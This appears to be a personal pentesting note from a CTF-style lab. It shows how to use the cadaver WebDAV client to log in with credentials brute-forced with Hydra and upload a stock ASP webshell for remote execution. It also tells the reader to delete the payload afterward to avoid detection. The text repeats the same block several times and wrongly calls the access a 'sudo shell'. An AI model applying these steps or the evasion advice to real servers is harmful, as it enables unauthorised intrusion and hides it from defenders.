Note | Knowledge Garden

:LiGithub:GitHub link: https://github.com/grimneko/cadaver

cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers.

Pre-installed on most offensive pentesting ditros like Kali & Parrot.

Command template: `cadaver http://<ip>/<directory_of_login_page>/`

Command Example: `cadaver http://10.2.29.97/webdav/`

After entering the username & password we got from Bruteforce with Hydra check [[04-WebDAV (80,443)]] This command will provide us with a sudo shell to the /webdav/ directory and from there we can upload a [[webshell]] from our machine to this server machine......###COOL

To Upload a file:* Use put then the path to the file==>`put /usr/share/webshells/asp/webshell.asp`

webdav.asp_execute.png

The FLAG:

commands in webdav.png

:LiGithub:GitHub link: https://github.com/grimneko/cadaver

cadaver supports file upload, download, on-screen display, in-place editing, namespace operations (move/copy), collection creation and deletion, property manipulation, and resource locking on WebDAV servers.

Command template: cadaver http://<ip>/<directory_of_login_page>/

Command Example: cadaver http://10.2.29.97/webdav/

To Upload a file:* Use put then the path to the file==>put /usr/share/webshells/asp/webshell.asp

The FLAG:

Important: You should delete the payload after gaining access to avoid detection

Command template: `cadaver http://<ip>/<directory_of_login_page>/`

Command Example: `cadaver http://10.2.29.97/webdav/`

To Upload a file:* Use put then the path to the file==>`put /usr/share/webshells/asp/webshell.asp`